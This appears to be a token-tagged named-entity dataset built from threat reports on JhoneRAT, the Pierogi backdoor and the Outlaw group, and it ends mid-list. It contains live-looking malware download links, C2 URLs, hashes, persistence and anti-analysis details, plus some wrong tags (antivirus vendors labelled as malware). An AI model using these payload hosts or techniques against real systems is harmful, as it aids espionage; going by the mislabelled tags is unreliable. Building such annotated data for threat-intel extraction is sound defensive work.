the O
code O
is O
executed O
. O

The O
purpose O
is O
to O
download O
an O
image O
from O
a O
new O
Google O
Drive O
link O
. O

It O
is O
interesting O
to O
note O
that O
the O
filename O
of O
the O
downloaded O
image O
is O
randomly O
generated O
based O
on O
a O
dictionary O
: O
Array O
("cartoon" O
, O
"img" O
,"photo") O
. O

The O
filename O
will O
be O
cartoon.jpg S-FILE
or O
img.jpg S-FILE
or O
photo.jpg S-FILE
and O
the O
image O
usually O
depicts O
a O
cartoon O
. O

The O
image O
file O
is O
a O
real O
image O
with O
a O
base64-encoded S-ENCR
binary O
appended O
at O
the O
end O
. O

The O
malware O
author O
has O
a O
curious O
sense O
of O
humor O
. O

The O
base64 S-ENCR
data O
and O
image O
are O
separated O
by O
the O
" O
**** O
" O
string O
. O

The O
decoded O
binary O
filename O
is O
also O
randomly O
generated O
based O
on O
a O
dictionary O
: O
Array("proc" O
, O
"chrome" O
, O
"winrar") O
. O

It O
can O
be O
proc.exe S-FILE
or O
chrome.exe S-FILE
or O
winrar.exe S-FILE
. O

The O
decoded O
base64 S-ENCR
data O
is O
an O
AutoIT S-TOOL
binary O
. O

This O
binary O
downloads O
a O
new O
file O
on O
Google B-TOOL
Drive E-TOOL
. O

The O
filename O
is O
also O
randomly O
generated O
based O
on O
a O
dictionary O
$ARRAY[5]=["prc" O
,"winrar" O
,"chrome" O
,"sync" O
,"COM O
surr"] O
. O

The O
final O
payload O
is O
a O
remote B-TOOL
access I-TOOL
tool E-TOOL
( O
RAT S-TOOL
) O
written O
in O
python S-TOOL
. O

We O
named O
this O
RAT S-TOOL
" O
JhoneRAT S-MAL
" O
. O

The O
python S-TOOL
code O
is O
wrapped O
into O
an O
executable O
using O
pyinstaller O
. O

It O
uses O
minimal O
obfuscation O
applied O
only O
on O
variables O
and O
function O
naming O
. O

The O
RAT S-TOOL
starts O
by O
launching O
three O
threads O
. O

The O
first O
is O
responsible O
for O
checking O
if O
the O
system O
has O
the O
targeted O
keyboard O
layout O
— O
this O
is O
exclusively O
in O
Arabic-speaking O
countries O
. O

The O
second O
will O
create O
the O
persistence O
and O
, O
finally O
, O
the O
last O
one O
to O
be O
started O
is O
the O
main O
cycle O
for O
the O
RAT S-TOOL
. O

As O
we O
explained O
before O
, O
the O
RAT S-TOOL
targets O
specific O
countries O
by O
checking O
the O
keyboard O
's O
layout O
. O

In O
fact O
, O
this O
is O
one O
of O
the O
first O
checks O
it O
performs O
when O
it O
is O
executed O
. O

The O
persistence O
is O
achieved O
by O
adding O
an O
entry O
with O
the O
name O
" O
ChromeUpdater O
" O
to O
the O
' O
Software\\Microsoft\\Windows\\CurrentVersion\\Run O
' O
. O

This O
RAT S-TOOL
uses O
three O
different O
cloud O
services O
to O
perform O
all O
its O
command B-TOOL
and I-TOOL
control E-TOOL
( O
C2 S-TOOL
) O
activities O
. O

It O
checks O
for O
new O
commands O
in O
the O
tweets O
from O
the O
handle O
@jhone87438316 O
( O
suspended O
by O
Twitter S-TOOL
) O
every O
10 O
seconds O
using O
the O
BeautifulSoup B-TOOL
HTML I-TOOL
parser E-TOOL
to O
identify O
new O
tweets O
. O

These O
commands O
can O
be O
issued O
to O
a O
specific O
victim O
based O
on O
the O
UID O
generated O
on O
each O
target O
( O
by O
using O
the O
disk O
serial O
and O
contextual O
information O
such O
as O
the O
hostname O
, O
the O
antivirus O
and O
the O
OS O
) O
or O
to O
all O
of O
them O
. O

The O
Exfiltration S-ACT
, O
however O
, O
is O
done O
via O
other O
cloud B-TOOL
providers E-TOOL
. O

The O
screenshots O
are O
exfiltrated O
via O
the O
ImgBB S-TOOL
website O
. O

The O
remaining O
commands O
send O
feedback O
by O
posting O
data O
into O
Google B-TOOL
Forms E-TOOL
. O

Finally O
, O
the O
RAT S-TOOL
is O
able O
to O
download O
files O
encoded O
in O
base64 S-ENCR
on O
Google B-TOOL
Drive E-TOOL
. O

Feature-wise O
, O
the O
RAT S-TOOL
has O
three O
commands O
: O

Take O
a O
screenshot O
and O
upload O
it O
to O
ImgBB S-TOOL
. O

Download O
binary O
disguised O
has O
a O
picture O
from O
Google B-TOOL
Drive E-TOOL
and O
execute O
it O
. O

Execute O
a O
command O
and O
send O
the O
output O
to O
Google B-TOOL
Forms E-TOOL
. O

The O
attacker O
put O
a O
couple O
of O
tricks O
in O
place O
to O
avoid O
execution O
on O
virtual O
machines O
( O
sandbox S-TOOL
) O
. O

The O
first O
trick O
is O
the O
check O
of O
the O
serial O
number O
of O
the O
disk O
. O

The O
actor O
used O
the O
same O
technique O
in O
the O
macro S-TOOL
and O
in O
the O
JhoneRAT S-MAL
. O

By O
default O
, O
most O
of O
the O
virtual O
machines O
do O
not O
have O
a O
serial O
number O
on O
the O
disk O
. O

The O
attacker O
used O
a O
second O
trick O
to O
avoid O
analysis O
of O
the O
python S-TOOL
code O
. O

The O
actor O
used O
the O
same O
trick O
that O
FireEye S-SECTEAM
in O
the O
Flare-On B-TOOL
6 E-TOOL
: O
Challenge O
7: O
They O
removed O
the O
header O
of O
the O
python S-TOOL
bytecode O
. O

It O
can O
be O
perfectly O
executed O
without O
the O
header O
, O
but O
tools O
such O
as O
uncompyle6 S-TOOL
need O
this O
header O
: O
$ O
uncompyle6 S-TOOL
final2 O
. O

ImportError O
: O
Unknown O
magic O
number O
227 O
in O
final2 O
. O

Additionally O
, O
the O
generated O
code O
by O
uncompyle6 S-TOOL
varies O
depending O
on O
the O
version O
and O
the O
impact O
is O
important O
. O

Based O
on O
our O
analysis O
and O
the O
behaviour O
of O
the O
executed O
malware O
, O
the O
correct O
interpretation O
is O
the O
first O
one O
based O
on O
the O
oldest O
version O
of O
uncompyle6 S-TOOL
. O

For O
this O
specific O
condition O
, O
it O
is O
important O
because O
it O
's O
filtering O
on O
the O
keyboard O
layout O
to O
identify O
the O
targets O
. O

This O
campaign O
shows O
a O
threat O
actor O
interested O
in O
specific O
Middle B-LOC
Eastern E-LOC
and O
Arabic-speaking O
countries O
. O

It O
also O
shows O
us O
an O
actor O
that O
puts O
effort O
in O
opsec S-TOOL
by O
only O
using O
cloud B-TOOL
providers E-TOOL
. O

The O
malicious O
documents O
, O
the O
droppers O
and O
the O
RAT S-TOOL
itself O
are O
developed O
around O
cloud B-TOOL
providers E-TOOL
. O

Additionally O
the O
attackers O
implemented O
anti-VM S-TOOL
( O
and O
sandbox S-TOOL
) O
and O
anti-analysis B-TOOL
tricks E-TOOL
to O
hide O
the O
malicious O
activities O
to O
the O
analyst O
. O

For O
example O
, O
the O
VM S-TOOL
or O
the O
sandbox S-TOOL
must O
have O
the O
keyboard O
layout O
of O
the O
targeted O
countries O
and O
a O
disk O
serial O
number O
. O

This O
campaign O
started O
in O
November B-TIME
2019 E-TIME
and O
it O
is O
still O
ongoing O
. O

At O
this O
time O
, O
the O
API O
key O
is O
revoked O
and O
the O
Twitter S-TOOL
account O
is O
suspended O
. O

However O
, O
the O
attacker O
can O
easily O
create O
new O
accounts O
and O
update O
the O
malicious O
files O
in O
order O
to O
still O
work O
. O

This O
campaign O
shows O
us O
that O
network-based O
detection O
is O
important O
but O
must O
be O
completed O
by O
system O
behaviour O
analysis O
. O

JhoneRAT S-MAL
: O
273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f S-SHA2
. O

JhoneRAT S-MAL
: O
29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091 S-SHA2
. O

JhoneRAT S-MAL
: O
d5f10a0b5c103100a3e74aa9014032c47aa8973b564b3ab03ae817744e74d079 S-SHA2
. O

JhoneRAT S-MAL
: O
6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4 S-SHA2
. O

JhoneRAT S-MAL
: O
7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69 S-SHA2
. O

JhoneRAT S-MAL
: O
b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366 S-SHA2
. O

JhoneRAT S-MAL
: O
https://drive.google.com/uc?export=download&amp;id=1vED0wN0arm9yu7C7XrbCdspLjpoPKfrQ S-MAL
. O

JhoneRAT S-MAL
: O
https://drive.google.com/uc?export=download&amp;id=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl S-DOM
. O

JhoneRAT S-MAL
: O
https://drive.google.com/uc?export=download&amp;id=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd S-DOM
. O

JhoneRAT S-MAL
: O
https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD S-DOM
. O

JhoneRAT S-MAL
: O
https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a S-DOM
. O

JhoneRAT S-MAL
: O
https://twitter.com/jhone87438316 S-DOM
. O


New O
Cyber O
Espionage O
Campaigns O
Targeting O
Palestinians S-LOC
- O
Part O
2 O
: O
The O
Discovery O
of O
the O
New O
, O
Mysterious O
Pierogi B-MAL
backdoor E-MAL
. O

Since O
December B-TIME
2019 E-TIME
, O
the O
Cybereason B-SECTEAM
Nocturnus E-SECTEAM
team O
has O
been O
investigating O
a O
campaign O
targeting O
Palestinian O
individuals O
and O
entities O
in O
the O
Middle B-LOC
East E-LOC
, O
mostly O
within O
the O
Palestinian B-LOC
territories E-LOC
. O

This O
campaign O
uses O
social O
engineering O
and O
decoy O
documents O
related O
to O
geopolitical O
affairs O
and O
relations O
between O
the O
Palestinian B-IDTY
government E-IDTY
, O
and O
references O
Egypt S-LOC
, O
Hezbollah S-LOC
, O
and O
Iran S-LOC
. O

Part O
one O
of O
this O
research O
investigates O
the O
Spark B-ACT
campaign E-ACT
, O
where O
attackers O
use O
social O
engineering O
to O
infect O
victims O
, O
mainly O
from O
the O
Palestinian B-LOC
territories E-LOC
, O
with O
the O
Spark B-MAL
backdoor E-MAL
. O

For O
more O
information O
about O
part O
one O
, O
click O
here O
. O

During O
the O
attacks O
, O
victims O
are O
infected O
with O
a O
previously O
undocumented O
backdoor S-MAL
, O
dubbed O
Pierogi S-MAL
by O
Cybereason S-IDTY
. O

This O
backdoor S-MAL
allows O
attackers O
to O
spy O
on O
targeted O
victims O
. O

Cybereason S-IDTY
suspects O
that O
the O
backdoor S-MAL
may O
have O
been O
obtained O
in O
underground O
communities O
rather O
than O
home-grown O
, O
as O
the O
evidence O
found O
in O
the O
code O
of O
the O
backdoor O
suggests O
it O
may O
have O
been O
developed O
by O
Ukranian-speaking O
hackers O
. O

The O
tactics O
, O
techniques O
, O
and O
procedures O
( O
TTPs O
) O
, O
content O
, O
and O
theme O
of O
the O
decoy O
documents O
, O
as O
well O
as O
the O
victimology O
observed O
in O
the O
campaign O
, O
resemble O
previous O
attacks O
that O
have O
targeted O
Palestinians O
. O

In O
particular O
, O
these O
campaigns O
appear O
to O
be O
related O
to O
attacks O
carried O
out O
by O
a O
group O
called O
MoleRATs S-APT
( O
aka O
, O
Gaza B-APT
Cyber I-APT
Gang E-APT
, O
Moonlight S-APT
) O
, O
an O
Arabic-speaking O
, O
politically O
motivated O
group O
that O
has O
been O
operating O
in O
the O
Middle B-LOC
East E-LOC
since O
2012 S-TIME
. O

Cyber O
Espionage O
with O
a O
New O
Malware O
: O
The O
Cybereason B-SECTEAM
Nocturnus E-SECTEAM
team O
has O
discovered O
recent O
, O
targeted O
attacks O
in O
the O
Middle B-LOC
East E-LOC
to O
deliver O
the O
Pierogi B-MAL
backdoor E-MAL
for O
politically-driven O
cyber O
espionage O
. O

Targeting O
Palestinians S-LOC
: O
The O
campaigns O
seems O
to O
target O
Palestinian O
individuals O
and O
entities O
, O
likely O
related O
to O
the O
Palestinian B-IDTY
government E-IDTY
. O

Using O
Geopolitically-charged O
Lure O
Content O
: O
The O
attackers O
use O
specially O
crafted O
lure O
content O
to O
trick O
their O
targets O
into O
opening O
malicious O
files O
that O
infect O
the O
victim O
’s O
machine O
with O
the O
Pierogi B-MAL
backdoor E-MAL
. O

The O
decoy O
content O
of O
the O
malicious O
files O
revolves O
around O
various O
political O
affairs O
in O
the O
Middle B-LOC
East E-LOC
, O
specifically O
targeting O
the O
tension O
between O
Hamas S-LOC
and O
other O
entities O
in O
the O
region O
. O

Perpetrated O
by O
an O
Arabic-speaking O
APT O
, O
MoleRATs S-APT
: O
The O
modus-operandi O
of O
the O
attackers O
as O
well O
as O
the O
social O
engineering O
decoy O
content O
seem O
aligned O
with O
previous O
attacks O
carried O
out O
by O
an O
Arabic-speaking O
APT O
group O
called O
MoleRATs S-APT
( O
aka O
Gaza B-APT
Cybergang E-APT
) O
. O

This O
group O
has O
been O
operating O
in O
the O
Middle B-LOC
East E-LOC
since O
2012 S-TIME
. O

Similar O
to O
previous O
attacks O
, O
this O
campaign O
starts O
with O
social O
engineering O
. O

In O
one O
instance O
, O
it O
lures O
victims O
to O
open O
an O
email S-TOOL
attachment O
. O

In O
others O
, O
it O
persuades O
victims O
to O
download O
a O
report O
about O
a O
recent O
political O
affair O
pertaining O
to O
the O
Middle B-LOC
East E-LOC
and O
specifically O
to O
Palestinian O
matters O
. O

In O
most O
cases O
, O
the O
downloaded O
file O
is O
either O
an O
executable O
that O
masquerades O
as O
a O
Microsoft B-TOOL
Word I-TOOL
document E-TOOL
or O
a O
weaponized B-TOOL
Microsoft I-TOOL
Word E-TOOL
document O
. O

As O
soon O
as O
the O
victim O
double-clicks O
on O
the O
dropper O
, O
they O
are O
presented O
with O
the O
decoy O
document O
. O

The O
document O
lowers O
the O
victim O
’s O
suspicions O
by O
distracting O
them O
with O
a O
real O
document O
while O
the O
dropper O
installs O
the O
backdoor S-MAL
. O

However O
, O
some O
of O
the O
documents O
also O
play O
an O
additional O
role O
in O
the O
attack O
. O

While O
some O
are O
more O
neutral O
, O
quoting O
from O
newspapers O
and O
the O
media O
, O
others O
seem O
to O
report O
fake O
news O
to O
spread O
misinformation O
that O
serves O
a O
political O
agenda O
. O

With O
regards O
to O
decoy O
content O
themes O
, O
this O
campaign O
resembles O
previous O
campaigns O
reported O
in O
blogs O
by O
Vectra O
, O
Unit B-SECTEAM
42 E-SECTEAM
, O
and O
Talos S-SECTEAM
. O

The O
contents O
of O
the O
decoy O
documents O
seems O
to O
include O
: O

Potentially O
fake O
documents O
that O
appear O
to O
be O
issued O
by O
the O
Palestinian B-IDTY
government E-IDTY
. O

Meetings O
minutes O
of O
different O
Palestinian S-LOC
organizations O
. O

News O
about O
Hamas S-LOC
and O
the O
Palestinian B-IDTY
National I-IDTY
Authority E-IDTY
. O

Potentially O
fake O
, O
leaked O
Hamas S-LOC
documents O
. O

Criticism O
of O
and O
embarrassing O
content O
about O
Hamas S-LOC
. O

APA S-IDTY B-FILE
adopted I-FILE
resolution I-FILE
Unlimited I-FILE
support I-FILE
for I-FILE
Palestinian I-FILE
people.docx E-FILE
: O

Describes O
a O
resolution O
by O
the O
Asian B-IDTY
Parliamentary I-IDTY
Assembly E-IDTY
( O
APA S-IDTY
) O
held O
in O
Anatalya S-LOC
, O
announcing O
unlimited O
support O
for O
the O
Palestinian O
people O
7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c S-SHA2
. O
jalsa.rar S-FILE
: O

Contains O
the O
above O
mentioned O
document O
, O
as O
well O
as O
photos O
of O
the O
assemblies O
and O
political O
cartoons O
criticizing O
Hamas S-LOC
50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b S-SHA2
. O

Internet B-FILE
in I-FILE
government.pdf E-FILE
/ O
Define B-FILE
the I-FILE
Internet I-FILE
in I-FILE
government I-FILE
institutions.pdf E-FILE
: O

Announcement O
about O
a O
new O
regulation O
regarding O
internet O
usage O
in O
Palestinian B-IDTY
government E-IDTY
institutions O
. O

The O
announcement O
states O
that O
porn O
, O
gambling O
and O
entertainment O
sites O
will O
be O
blocked O
9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 S-SHA2
. O

Congratulations_Jan-7.pdf S-FILE
: O

Letter O
allegedly O
from O
the O
Barcelona B-IDTY B-LOC
branch E-LOC E-IDTY
of O
the O

Federation B-IDTY
of I-IDTY
Independent I-IDTY
Palestinian I-IDTY
Communities I-IDTY
and I-IDTY
Organizations I-IDTY
and I-IDTY
Events E-IDTY
in O
the O
Diaspora O
. O

The O
letter O
commemorates O
the O
73rd O
anniversary O
of O
the O
Syrian B-IDTY
Army E-IDTY
, O
and O
expresses O
the O
Palestinian O
support O
of O
Bashar O
Al-Asad O
. O

The O
letter O
ends O
with O
“ O
Death O
to O
Israel O
” O
and O
“ O
Humiliation O
and O
shame O
to O
the O
tyrant O
America O
” O
65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc S-SHA2
. O

Daily_Report.docx S-FILE
: O

Daily O
summary O
of O
news O
concerning O
different O
Palestinian B-IDTY
govenment E-IDTY
related O
issues O
d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428 S-SHA2
. O

Directory B-FILE
of I-FILE
Government I-FILE
Services.pdf E-FILE
: O

A O
screenshot O
from O
a O
website O
of O
the O
Palestinian B-IDTY
government E-IDTY
, O
showing O
a O
directory O
of O
the O
different O
ministries O
9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 S-SHA2
. O

Meeting B-FILE
Agenda.pdf E-FILE
: O

Corrupted O
file O
f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 S-SHA2
. O
imgonline-com-ua-dexifEEdWuIbNSv7G.jpg S-FILE
: O

potentially O
leaked O
Hamas S-LOC
document O
detailing O
Hamas S-LOC
32nd O
anniversary O
expenses O
in O
different O
regions O
in O
the O
Palestinian B-LOC
Territories E-LOC
932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb S-SHA2
. O

Asala.mp3 S-FILE
: O

An O
.mp3 S-FILE
file O
of O
a O
song O
by O
the O
famous O
Syrian S-LOC
singer O
Asala O
Nasri O
( O
song O
name O
: O
Fen O
Habibi O
, O
translation O
: O
“ O
where O
is O
my O
loved O
one? O
” O
) O
4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964 S-SHA2
. O

In O
addition O
to O
the O
documents O
, O
the O
content O
includes O
a O
number O
of O
political O
cartoons O
that O
criticize O
Hamas S-LOC
’ O
relations O
with O
Iran S-LOC
and O
Hamas S-LOC
’ O
standing O
as O
a O
resistance O
movement O
. O

While O
the O
majority O
of O
infections O
in O
this O
campaign O
did O
not O
originate O
from O
Malicious B-TOOL
Microsoft I-TOOL
Word I-TOOL
document E-TOOL
, O
the O
Cybereason B-SECTEAM
Nocturnus E-SECTEAM
team O
found O
several O
weaponized B-TOOL
Microsoft I-TOOL
Word I-TOOL
document E-TOOL
with O
an O
embedded O
downloader B-TOOL
macro E-TOOL S-TOOL
that O
downloads O
and O
installs O
the O
backdoor S-MAL
used O
in O
this O
attack O
. O

CV B-FILE
Manal I-FILE
1 E-FILE
: O

Resume O
of O
a O
woman O
from O
Abu-Dis S-LOC
, O
Palestinian B-IDTY
Authority E-IDTY
4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f S-SHA2
. O

Employee-entitlements-2020.doc S-FILE
: O

A O
statement O
of O
the O
Ministry B-IDTY
of I-IDTY
Finance E-IDTY
on O
civil O
and O
military O
employee O
benefits O
and O
salaries O
, O
discussing O
the O
conterversial O
issue O
Palestinian B-IDTY
Authority E-IDTY
employees O
that O
have O
not O
been O
paid O
or O
paid O
in O
full O
their O
salaries O
b33f22b967a5be0e886d479d47d6c9d35c6639d2ba2e14ffe42e7d2e5b11ad80 S-SHA2
. O

When O
the O
victims O
open O
the O
document O
, O
they O
are O
encouraged O
to O
click O
on O
Enable O
Content O
, O
which O
causes O
the O
embedded O
malicious B-TOOL
macro E-TOOL S-TOOL
code O
to O
run O
. O

The O
macro O
code O
embedded O
in O
the O
document O
is O
rather O
simple O
and O
is O
not O
obfuscated O
. O

In O
fact O
, O
it O
is O
almost O
unusual O
in O
its O
unsophistication O
. O

The O
macro O
code O
does O
the O
following O
: O

Downloads O
a O
Base64 S-ENCR
encoded O
payload O
from O
the O
following O
URL O
: O

http://linda-callaghan.icu/Minkowski/brown S-URL
. O

Writes O
the O
decoded O
payload O
to O
C:\ProgramData\IntegratedOffice.txt O
. O

Decodes O
the O
Base64 S-ENCR
payload O
and O
writes O
the O
file O
to O
C:\ProgramData\IntegratedOffice.exe S-FILE
. O

Runs O
the O
executable O
file O
and O
deletes O
the O
.txt S-FILE
file O
. O

Pierogi S-MAL
, O
the O
backdoor S-MAL
in O
this O
attack O
, O
appears O
to O
be O
a O
new O
backdoor S-TOOL
written O
in O
Delphi S-TOOL
. O

It O
enables O
the O
attackers O
to O
spy O
on O
victims O
using O
rather O
basic O
backdoor S-MAL
capabilities O
. O

While O
it O
is O
unknown O
at O
this O
point O
whether O
the O
backdoor S-MAL
was O
coded O
by O
the O
same O
members O
of O
the O
group O
behind O
the O
attacks O
, O
there O
are O
indications O
that O
suggest O
that O
the O
malware O
was O
authored O
by O
Ukranian-speaking O
malware O
developers O
. O

The O
commands O
used O
to O
communicate O
with O
the O
C2 S-TOOL
servers O
and O
other O
strings O
in O
the O
binary O
are O
written O
in O
Ukrainian O
. O

This O
is O
why O
we O
chose O
to O
name O
the O
malware O
Pierogi S-MAL
, O
after O
the O
popular O
East B-LOC
European E-LOC
dish O
. O

The O
backdoor O
has O
the O
following O
capabilities O
: O

Collects O
information O
about O
the O
infected O
machine O
. O

Uploads O
files O
to O
the O
attackers O
’ O
server O
. O

Downloads O
additional O
payloads O
. O

Takes O
screenshots O
from O
the O
infected O
machine O
. O

Executes O
arbitrary O
commands O
via O
the O
CMD B-TOOL
shell E-TOOL
. O

In O
addition O
to O
spy O
features O
, O
the O
backdoor S-MAL
also O
implements O
a O
few O
checks O
to O
ensure O
it O
is O
running O
in O
a O
safe O
environment O
. O

Specifically O
, O
it O
looks O
for O
antivirus O
and O
other O
security O
products O
. O

The O
backdoor S-MAL
queries O
Windows S-OS
for O
installed O
antivirus O
software O
using O
WMI S-TOOL
: O
SELECT O
* O
FROM O
AntiVirusProduct O
It O
looks O
for O
specific O
antivirus O
and O
security O
products O
installed O
on O
the O
infected O
machine O
, O
such O
as O
Kaspersky S-MAL
, O
eScan S-MAL
, O
F-secure S-MAL
and O
Bitdefender S-MAL
. O

The O
backdoor S-MAL
achieves O
persistence O
using O
a O
classic O
startup O
item O
autorun O
technique O
: O

A O
shortcut O
is O
added O
to O
the O
the O
startup O
folder O
: O
C:\Users\User\AppData\Roaming\Microsoft\Windows\Start O
Menu\Programs\Startup O
. O

Once O
the O
user O
logs O
on O
to O
the O
infected O
machine O
, O
the O
shortcut O
points O
to O
the O
file O
binary O
location O
in O
the O
C:\ProgramData\ O
folder O
. O

The O
GUID S-TOOL
generated O
by O
the O
malware O
is O
saved O
in O
a O
file O
called O
GUID.bin S-FILE
. O

This O
file O
is O
created O
in O
the O
same O
folder O
as O
the O
binary O
of O
the O
backdoor S-MAL

( O
C:\ProgramData\GUID.bin O
) O
. O

The O
backdoor S-MAL
has O
rather O
basic O
C2 S-TOOL
functionality O
implemented O
through O
a O
predefined O
set O
of O
URLs O
: O

1 O
. O

Sending O
machine O
information O
and O
a O
heartbeat O
to O
the O
C2 S-TOOL
: O

URL O
: O
http://nicoledotson.icu/debby/weatherford/Yortysnr S-URL
The O
information O
sent O
to O
the O
C2 S-TOOL
includes O
: O

cname O
: O

computer O
name O
, O
username O
, O
and O
GUID S-TOOL
. O
av O
: O
Name O
of O
detected O
antivirus O
. O
osversion O
: O
version O
of O
the O
operating O
system O
. O
aname O
: O
the O
location O
of O
the O
malware O
on O
the O
infected O
machine O
. O

Requesting O
commands O
from O
the O
C2 S-TOOL
server O
: O

URL O
: O
http://nicoledotson.icu/debby/weatherford/Ekspertyza S-URL
. O

Ekspertyza O
means O
expertise O
or O
examination O
in O
Ukranian O
. O

There O
are O
3 O
basic O
commands O
coming O
from O
the O
server O
in O
the O
form O
of O
MD5 S-ENCR
hashes O
: O

Dfff0a7fa1a55c8c1a4966c19f6da452 S-MD5
: O
cmd O
. O
51a7a76a7dd5d9e4651fe3d4c74d16d6 S-SHA2
: O
downloadfile O
. O
62c92ba585f74ecdbef4c4498a438984 S-SHA2
: O
screenshot O
. O

Uploading O
data O
( O
mainly O
screenshots O
) O
to O
the O
C2 S-TOOL
: O

URL O
: O
http://nicoledotson.icu/debby/weatherford/Zavantazhyty S-URL
. O

Zavantazhyty O
means O
to O
load O
or O
download O
in O
Ukranian O
. O

This O
command O
is O
used O
to O
upload O
collected O
data O
to O
the O
C2 S-TOOL
server O
. O

For O
example O
, O
in O
some O
instances O
the O
backdoor S-MAL
uploads O
screenshots O
taken O
from O
an O
infected O
machine O
, O
as O
can O
be O
seen O
in O
the O
example O
below O
. O

Removing O
information O
: O

URL O
: O
http://nicoledotso.icu/debby/weatherford/Vydalyty S-URL
. O

Vydalyty O
means O
to O
remove O
or O
delete O
in O
Ukrainian O
. O

The O
malware O
can O
delete O
various O
requests O
based O
on O
the O
command O
below O
. O

The O
records O
of O
the O
domains O
and O
IPs O
involved O
in O
this O
campaign O
seem O
to O
show O
that O
the O
attackers O
created O
a O
new O
infrastructure O
specifically O
for O
this O
campaign O
. O

The O
domains O
were O
registered O
in O
November B-TIME
2019 E-TIME
and O
operationalized O
shortly O
after O
. O

In O
part O
two O
of O
this O
research O
, O
we O
examined O
the O
Pierogi B-ACT S-MAL I-ACT
campaign E-ACT
. O

Cybereason S-SECTEAM
suspects O
this O

campaign O
targets O
Palestinian O
individuals O
and O
entities O
in O
the O
Middle B-LOC
East E-LOC
, O
specifically O
directed O
at O

those O
in O
the O
Palestinian B-IDTY
government E-IDTY
. O

The O
threat O
actors O
behind O
the O
campaign O
use O
social O
engineering O
to O
infect O
their O
victims O
with O
the O
Pierogi B-MAL
backdoor E-MAL
for O
cyber O
espionage O
purposes O
. O

The O
threat O
actor O
behind O
the O
attack O
invested O
considerable O
time O
and O
effort O
to O
lure O
their O
victims O
with O
specially-crafted O
documents O
that O
target O
Palestinian O
individuals O
and O
entities O
in O
the O
Middle B-LOC
East E-LOC
. O

In O
our O
analysis O
, O
we O
reviewed O
the O
TTPs O
and O
the O
decoy O
content O
, O
and O
pointed O
out O
the O
similarities O
between O
previous O
attacks O
that O
have O
been O
attributed O
to O
MoleRATs S-APT
, O
an O
Arabic-speaking O
, O
politically O
motivated O
group O
that O
has O
operated O

in O
the O
Middle B-LOC
East E-LOC
since O
2012 S-TIME
. O

The O
Pierogi B-MAL
backdoor E-MAL
discovered O
by O
Cybereason S-SECTEAM
during O
this O
investigation O
seems O
to O
be O
undocumented O
and O
gives O
the O
threat O
actors O
espionage O
capabilities O
over O
their O
victims O
. O

Based O
on O
the O
Ukranian O
language O
embedded O
in O
the O
backdoor S-MAL
, O
Cybereason S-SECTEAM
raises O
the O
possibility O
that O
the O
backdoor S-MAL
was O
obtained O
in O
underground O
communities O
by O
the O
threat O
actors O
, O
rather O
than O
developed O
in-house O
by O
the O
group O
. O


Outlaw S-APT
Updates O
Kit O
to O
Kill O
Older O
Miner O
Versions O
, O
Targets O
More O
Systems O
. O

As O
we O
’ve O
observed O
with O
cybercriminal O
groups O
that O
aim O
to O
maximize O
profits O
for O
every O
campaign O
, O
silence O
does O
n’t O
necessarily O
mean O
inactivity O
. O

It O
appears O
hacking O
group O
Outlaw S-APT
, O
which O
has O
been O
silent O
for O
the O
past O
few O
months O
, O
was O
simply O
developing O
their O
toolkit O
for O
illicit O
income O
sources O
. O

While O
they O
have O
been O
quiet O
since O
our O
June O
analysis O
, O
we O
observed O
an O
increase O
in O
the O
group O
’s O
activities O
in O
December S-TIME
, O
with O
updates O
on O
the O
kits O
’ O
capabilities O
reminiscent O
of O
their O
previous O
attacks O
. O

The O
updates O
expanded O
scanner O
parameters O
and O
targets O
, O
looped O
execution O
of O
files O
via O
error O
messages O
, O
improved O
evasion O
techniques O
for O
scanning O
activities O
, O
and O
improved O
mining O
profits O
by O
killing O
off O
both O
the O
competition O
and O
their O
own O
previous O
miners O
. O

We O
analyzed O
the O
kits O
, O
which O
were O
designed O
to O
steal O
information O
from O
the O
automotive O
and O
finance O
industries O
, O
launch O
subsequent O
attacks O
on O
already O
compromised O
systems O
, O
and O
( O
possibly O
) O
sell O
stolen O
information O
. O

Comparing O
this O
development O
to O
their O
previous O
attacks O
, O
we O
think O
Outlaw S-APT
may O
be O
aiming O
to O
go O
after O
enterprises O
that O
have O
yet O
to O
update O
their O
systems O
, O
assessing O
security O
and O
changes O
with O
their O
previously O
infected O
hosts O
, O
finding O
new O
and O
old O
targets O
, O
and O
possibly O
testing O
their O
updates O
in O
the O
wild O
. O

We O
will O
continue O
to O
observe O
the O
group O
’s O
activities O
as O
they O
target O
industries O
from O
the B-LOC
United I-LOC
States E-LOC
and O
Europe S-LOC
. O

Based O
on O
the O
samples O
we O
collected O
and O
traced O
to O
456 O
distinct O
IPs O
, O
we O
expect O
the O
group O
to O
be O
more O
active O
in O
the O
coming O
months O
as O
we O
observed O
changes O
on O
the O
versions O
we O
acquired O
. O

These O
new O
samples O
targeted O
Linux- S-OS
and O
Unix-based B-OS
operating I-OS
systems E-OS
, O
vulnerable O
servers O
, O
and O
internet O
of O
things O
( O
IoT O
) O
devices O
by O
exploiting O
known O
vulnerabilities O
with O
available O
exploits O
. O

This O
time O
, O
the O
group O
explored O
unpatched O
systems O
vulnerable O
to O
CVE-2016-8655 S-VULID
and O
Dirty B-VULNAME
COW E-VULNAME
exploit O
( O
CVE-2016-5195 S-VULID
) O
as O
attack O
vectors O
. O

Files O
